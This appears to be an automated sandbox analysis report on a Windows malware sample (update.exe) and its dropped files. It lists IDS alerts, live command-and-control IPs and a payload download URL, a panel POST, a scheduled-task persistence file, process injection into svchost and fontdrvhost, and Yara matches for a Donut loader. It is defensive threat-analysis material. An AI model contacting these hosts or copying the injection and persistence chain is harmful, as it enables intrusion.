Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 96.9.125.78:1432 -> 192.168.2.5:49839

Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224
Source: unknown	TCP traffic detected without corresponding DNS query: 45.93.20.224

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_0087C3B0 InternetOpenA,InternetOpenUrlA,InternetReadFile,Sleep,

1_2_0087C3B0

Source: global traffic	HTTP traffic detected: GET /XvpSGEH.png HTTP/1.1Host: i.imgur.comAccept: /
Source: global traffic	HTTP traffic detected: GET /Reader/readerupdate2.exe HTTP/1.1Host: 45.93.20.224

Source: global traffic	DNS traffic detected: DNS query: time.google.com
Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: time.facebook.com
Source: global traffic	DNS traffic detected: DNS query: ntp1.net.berkeley.edu
Source: global traffic	DNS traffic detected: DNS query: ts1.aco.net
Source: global traffic	DNS traffic detected: DNS query: time-a-g.nist.gov
Source: global traffic	DNS traffic detected: DNS query: ntp.time.in.ua
Source: global traffic	DNS traffic detected: DNS query: ntp.time.nl
Source: global traffic	DNS traffic detected: DNS query: ntp1.hetzner.de
Source: global traffic	DNS traffic detected: DNS query: ntp.nict.jp
Source: global traffic	DNS traffic detected: DNS query: time.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: gbg1.ntp.se
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: x.ns.gin.ntt.net

Source: unknown

HTTP traffic detected: POST /pNdj30Vs11/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.93.20.224Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: update.exe, 00000001.00000003.1329729238.0000000000836000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000001.00000003.1332563835.0000000000836000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000001.00000002.1334217136.0000000000836000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000001.00000003.1330135947.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.j
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1522357070.0000000002A7C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1523710154.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 0000000A.00000002.1620464063.00000203B6860000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://96.9.125.78:1432/c9c0a58659bbbb6615bc38c/pd8un5fd.jkuna
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1523710154.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000A.00000002.1620464063.00000203B6860000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://96.9.125.78:1432/c9c0a58659bbbb6615bc38c/pd8un5fd.jkunakernelbasentdllkernel32GetProcessMiti
Source: svchost.exe, 00000006.00000002.1522357070.0000000002A7C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://96.9.125.78:1432/c9c0a58659bbbb6615bc38c/pd8un5fd.jkunax
Source: chrome.exe, 0000001B.00000002.1943094776.0000179C02A5C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000001B.00000002.1943094776.0000179C02A5C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: svchost.exe, 00000006.00000003.1480372333.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: svchost.exe, 00000006.00000003.1480372333.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
Source: chrome.exe, 0000001B.00000002.1943094776.0000179C02A5C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49843 version: TLS 1.2

Source: rdha.exe, 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_c53808f5-4

Source: rdha.exe, 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_261f1a33-b

Source: Yara match	File source: 19.3.rdha.exe.3250000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.rdha.exe.3030000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.svchost.exe.5380000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rdha.exe.3240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.svchost.exe.4ff0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.svchost.exe.5210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.svchost.exe.5520000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.svchost.exe.5520000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.svchost.exe.5300000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.svchost.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.rdha.exe.32a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.rdha.exe.32a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rdha.exe.3020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.rdha.exe.3080000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.1620431709.00000000032A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1705857758.0000000005520000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1459821006.0000000003240000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1624398459.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1705586750.0000000005300000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1462888323.0000000005210000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1624135816.0000000005380000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1462640595.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1697033886.0000000003250000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1696830808.0000000003030000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rdha.exe PID: 8676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rdha.exe PID: 7092, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000013.00000003.1697867340.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000003.1621387285.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000001.00000002.1336328795.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000003.1460689695.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000002.00000002.1337055476.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

.NET source code contains very large strings

Source: 9ua5N7dcBZ.exe, Program.cs	Long String: Length: 838752
Source: readerupdate2[1].exe.3.dr, Program.cs	Long String: Length: 918580
Source: readerupdate2.exe.3.dr, Program.cs	Long String: Length: 918580

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0BBB80 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	1_2_6D0BBB80
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_02571A83 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	1_2_02571A83
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C82BB80 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	2_2_6C82BB80
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00761A83 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	2_2_00761A83
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_02542076 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	5_3_02542076
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4D9B90 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	5_2_6C4D9B90
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 10_2_00000203B6861AA4 NtAcceptConnectPort,NtAcceptConnectPort,	10_2_00000203B6861AA4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 10_2_00000203B6861CF4 NtAcceptConnectPort,CloseHandle,	10_2_00000203B6861CF4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 10_2_00000203B68615C0 NtAcceptConnectPort,	10_2_00000203B68615C0
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 10_2_00000203B6860AC8 NtAcceptConnectPort,NtAcceptConnectPort,	10_2_00000203B6860AC8
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_3_02542076 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	15_3_02542076

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

File created: C:\Windows\Tasks\Gxtuum.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0B5D80	1_2_6D0B5D80
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0CF5E0	1_2_6D0CF5E0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0C34A0	1_2_6D0C34A0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0BDF50	1_2_6D0BDF50
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0CBEAF	1_2_6D0CBEAF
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0CE6D0	1_2_6D0CE6D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0D01A0	1_2_6D0D01A0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0C70E0	1_2_6D0C70E0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0C6BDB	1_2_6D0C6BDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0DD3E5	1_2_6D0DD3E5
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008661F0	1_2_008661F0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008A4047	1_2_008A4047
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008651A0	1_2_008651A0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0088B4C0	1_2_0088B4C0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_00865450	1_2_00865450
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0088F6DB	1_2_0088F6DB
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0089C6DD	1_2_0089C6DD
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008A18D7	1_2_008A18D7
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008A5CD4	1_2_008A5CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_00892C20	1_2_00892C20
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008A5DF4	1_2_008A5DF4
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_00864EF0	1_2_00864EF0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_02571A83	1_2_02571A83
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C8334A0	2_2_6C8334A0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C825D80	2_2_6C825D80
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C83F5E0	2_2_6C83F5E0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C83BEAF	2_2_6C83BEAF
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C83E6D0	2_2_6C83E6D0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C82DF50	2_2_6C82DF50
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C8370E0	2_2_6C8370E0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C8401A0	2_2_6C8401A0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C836BDB	2_2_6C836BDB
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C84D3E5	2_2_6C84D3E5
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00761A83	2_2_00761A83
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00894047	2_2_00894047
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_008551A0	2_2_008551A0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_008561F0	2_2_008561F0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0087B4C0	2_2_0087B4C0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00855450	2_2_00855450
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0088C6DD	2_2_0088C6DD
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0087F6DB	2_2_0087F6DB
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0085E8B0	2_2_0085E8B0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_008918D7	2_2_008918D7
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00895CD4	2_2_00895CD4
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00882C20	2_2_00882C20
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00895DF4	2_2_00895DF4
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00854EF0	2_2_00854EF0
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Code function: 4_2_00007FF7C77526F5	4_2_00007FF7C77526F5
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_02542076	5_3_02542076
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4FB455	5_2_6C4FB455
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4E5540	5_2_6C4E5540
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4EA5BF	5_2_6C4EA5BF
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4DBF60	5_2_6C4DBF60
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4E1F00	5_2_6C4E1F00
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4E503B	5_2_6C4E503B
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4ED0A0	5_2_6C4ED0A0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4EE210	5_2_6C4EE210
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4EDB40	5_2_6C4EDB40
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0061CC25	5_2_0061CC25
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0060C09A	5_2_0060C09A
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00611170	5_2_00611170
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0060F13B	5_2_0060F13B
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0061264D	5_2_0061264D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0060C3DC	5_2_0060C3DC
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 10_2_00000203B6860C70	10_2_00000203B6860C70
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_3_02542076	15_3_02542076
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000CCC25	15_2_000CCC25
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000BC09A	15_2_000BC09A
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000BF13B	15_2_000BF13B
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000C1170	15_2_000C1170
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000C264D	15_2_000C264D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000BC3DC	15_2_000BC3DC

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe 796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5

